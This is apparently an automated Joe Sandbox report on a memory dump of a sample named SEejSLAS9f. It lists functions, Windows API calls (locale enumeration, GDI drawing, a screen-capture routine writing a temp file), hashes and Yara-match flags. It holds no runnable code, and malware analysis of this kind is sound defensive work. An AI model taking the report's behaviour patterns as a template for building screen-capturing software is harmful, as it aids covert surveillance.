Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: a185d91d498a99ac7c5dba8311b9715d276e1c5d042b0f2b32af02cac09110ce
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: 17F0F6363007045FDB245F39DCA1B7B7B95EF9076CF15442EFA058B650D7B198029B44

Function 024A5427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024A047A,?,00000004), ref: 024A547A

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: 3a034e8758d3c2566f8fc9f6e201ee483d0d5593cc91ff2f68cd3d195e4bbae0
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: FAF02B31A80318BFDB015F51CD01F6E7B26EF14F02F80411AFD0566290DA718D20EB89

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 024A5034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0249E654: RtlEnterCriticalSection.NTDLL(02020DAF), ref: 0249E663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024A506C

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: 275d1a892d870f1ca76b650ef4b51d2880c8a371f56df8ba81daaf226e8273a2
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: A9F03C32A20304DBEB10EF69D905B5D7BE1AF15721F10416AF900DB2A1CB759944CF49

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 024AB4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024ABCAB,024A0A1C,?,?,?,?,?,024A0A1C,?,?,?), ref: 024AB520

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: 3579ef75552df262562f64ed2d03fba6be7e3c6fede81762f97e666ce92e754b
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: 9BF0553A30020857CB089F36DC2476BBF90EFC1B54B0A005EEF098B290C3719842C790

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 024808CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0247FE60), ref: 024808D2

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 024976EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: e114a8e1dd15bc6f83e9dece8229249b59545efe4b518ba0d7b5843e99a70b87
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: 40D1D7B22185A20EDF2D4A3E847013BFFE1AA421A530D479FD4F7CA6C2EE24D555D760

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 02497FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 2ff1cd91a19711ef11f2096e5f873511c357c4e869f8aec352f0182ea9432992
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: A59134722090A34AEF6A463E847553FFFE15A432A530A079FD4F3CA2C5EF24D595DA20

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 02498289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 58bc820066537845c5dfd8eb285c971aa4630ab958f1ebaf903d668fe5e821c0
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 759130722090A34AEF69467E857853FFFE15A832A530A079FD4F2CA2C5FF24C565D620

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 02497D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: ceb6ed164c2703431933d3f107e67ce29aef7bf2bdd6105665dd5e4c1ef5a482
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: AF9151B22190A30AEF69463D857453FFFE19A421A570A079FE4F3CB2C5EF248554D720

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 0249D755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: eeda33b33dff9b20f07bdfbdd9f4ad6545a383daf2adb216929d4437a8c9450c
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 13616731E00B04EADF38FB6C8980BBF6F959F41A48F04085BE852DB3C6D7169982CB55

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 02497A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 99144836b274ddb659fc66beb18442937b241524431016a47afc579ec539c171
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: A48140B22190A34EEF69467E847453FFFE15A821A530A079FD4F2CB2C5EF248665D720

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 024987C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 58b9be14918f1d440f00fc37e96827639e54099312ecb86735a08bdafa71ead0
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 1311E77720004247DE58CB3ED8B46BBEF95EBC7268B2D56BBD0414B758D322E145D620

Function 008DDEA3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 95387b00ceea96303a7758962d3c26b9083f90cdf35009b3d63e7db42173688c
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: FE117C72380200AFD744DF59DC81FA677EAFB99320B298166ED09CB312DA75E842C760

Function 02470D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8d0a441c2d4b0705bf0afeee984720ee9befd2432816eb00777e17293a30e26e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 14012672A126008FDF21CF60C904BEB33F5FB86206F1554B6D92AD7381E370A841CB80

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 0249E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0249E989
_free.LIBCMT ref: 0249E99F
_free.LIBCMT ref: 0249E9B0
_free.LIBCMT ref: 0249E9C1
_free.LIBCMT ref: 0249E9D8
GetCPInfo.KERNEL32(?,?), ref: 0249EA20

Part of subcall function 024A6952: _free.LIBCMT ref: 024A69BD

_free.LIBCMT ref: 0249EBCC
_free.LIBCMT ref: 0249EBDF
_free.LIBCMT ref: 0249EBED
_free.LIBCMT ref: 0249EBF8
_free.LIBCMT ref: 0249EC3A
_free.LIBCMT ref: 0249EC42
_free.LIBCMT ref: 0249EC4A
_free.LIBCMT ref: 0249EC52
_free.LIBCMT ref: 0249EC60

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: ea4dd1e2edb3804b974ab9388d5c5612ae3dc984f0881e9333345666a15f48f5
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
